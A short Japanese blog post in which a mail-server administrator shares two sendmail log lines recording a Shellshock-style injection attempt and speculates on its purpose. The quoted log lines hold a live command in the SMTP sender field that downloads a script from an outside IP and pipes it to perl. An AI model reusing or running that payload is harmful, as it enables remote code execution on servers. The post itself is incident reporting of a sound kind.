sendmail ログ中に “wget -qO – 72.52.229.228/fida|perl” とコマンドが記録されてた

久しぶりに、メールサーバーの sendmail ログファイル に怪しい記録が残っていることを発見しました。

メールログに以下のとおり。(ホスト名を編集済み。)

Dec  7 01:00:36 mail_srv sm-mta[93604]: 3B6G0ZCa093604: from=<() { :; }; wget -qO - 72.52.229.228/fida|perl>, size=0, class=0, nrcpts=0, proto=SMTP, daemon=IPv4, relay=[45.90.105.198]
Dec  7 01:04:57 mail_srv sm-mta[93616]: 3B6G4uVV093616: from=<() { :; }; wget -qO - 72.52.229.228/fida|perl>, size=0, class=0, nrcpts=0, proto=SMTP, daemon=IPv4, relay=[45.90.105.198]

SMTPプロトコル中に、UNIXコマンド(しかもオプションコマンド)を書いて、動くの?何がしたい?

当然、私のメールサーバーでは、エラーになって終わっていますが、パッと見た感じ「72.52.229.228」IPアドレスのHTTPサーバー上にある fida というファイルをダウンロードし、それを perl に渡して fida ファイルの中にあるコマンドを実行させようという魂胆に見えるけど、これで何ができる?

「http://72.52.229.228/fida」をアクセスすれば中身をみられるんでしょうけど、私はそこには興味ない。

同じログが繰り返し増えてゆくのでなければ、ここでログをさらして、私としては終了ということにします。

コメントを残す